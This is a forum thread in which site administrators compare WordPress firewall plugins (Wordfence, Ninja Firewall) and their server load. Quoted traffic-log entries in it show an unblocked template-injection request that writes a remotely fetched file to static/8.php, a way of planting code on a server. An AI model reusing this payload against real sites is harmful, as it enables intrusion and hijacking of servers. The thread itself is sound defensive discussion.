NOT BLOCKED - MISSED.
The urls don't exist, still this should have been blocked, since it is clearly a SQL/XSS injection attempt.
Our Imunify360 server-wide protection also missed that, i alrealy know their reply from a previous incident: "why block a 404 url".
Ninja Firewall would have blocked that.
Recent Activity
Time: 1 hour 9 minutes ago -- Tue, 19 Dec 23 13:47:20 +0000 -- 1702993640.482122 in Unixtime
Seconds since last hit: 0.6399
URL: https: // removed /?tagstpl=about.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=static/8.php&t2=file_get_contents&t3=http: // www . goodway . com . hk/d.txt (opens in new tab)
Type: Page not found
Full Browser ID: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Location: ChinaTime: 1 hour 9 minutes ago -- Tue, 19 Dec 23 13:47:19 +0000 -- 1702993639.842247 in Unixtime
URL: https: // removed /?tag&tagstpl=about.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=static/8.php&t2=file_get_contents&t3=http: // www . goodway . com . hk/d.txt (opens in new tab)
Type: Normal request
Full Browser ID: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Location: China
On the other hand, those have been blocked by THEIR firewall rules (their network rules):
Netherlands was blocked by firewall for WooCommerce Payments <= 5.6.1 Authentication Bypass and Privilege Escalation
IP: 45.154.98.137 Hostname: 45.154.98.137.powered.by.rdp.sh
and
Ukraine was blocked by firewall for N-Media Post Front-end Form < 1.1 - Arbitrary File Upload
IP: 194.38.22.71 Hostname: nbl216.ntup.net
Still, i don't use WooCommerce or any related plugin or that N-Media Post Front-end Form plugin.
So the blocks are more "precautionary" measures in this case, BUT in my first post .... the SQL/XSS (also 404) were not blocked as preventive measures.
I was under the impression that you used Ninja Firewall and not Wordfence :)
@maximus We were running Ninja Firewall for severals years, after the fiasko using The Shield plugin and get hacked.
Ninja Firewall is an excellent and extremely FAST firewall, but it is missing some features we needed here. Like the ability to block a range of IPs, User Agents, Hostnames etc. Rate Limiting also is a great feature and along with the Live Traffic monitor, makes Wordfence a great choice for us.
The only thing i have disabled is Wordfence Scan, since it seems to create all kind of problems and issues. Also Wordfence is not a lightweight plugin by any means.
Isn't that plugin heavy heavy for the DB and the CPUs?
Isn't that plugin heavy heavy for the DB and the CPUs?
The Scan was heavy on the server, but i haven't noticed anything after i disabled it. Just a 5%-8% on the overall system loading BUT i have several custom blocks (user agents and hostnames) on Wordfence (around 80). Also when we rate limit, we auto BLOCK the IP for a week and those IPs add-up until cleared. So some DB usage going on all the time.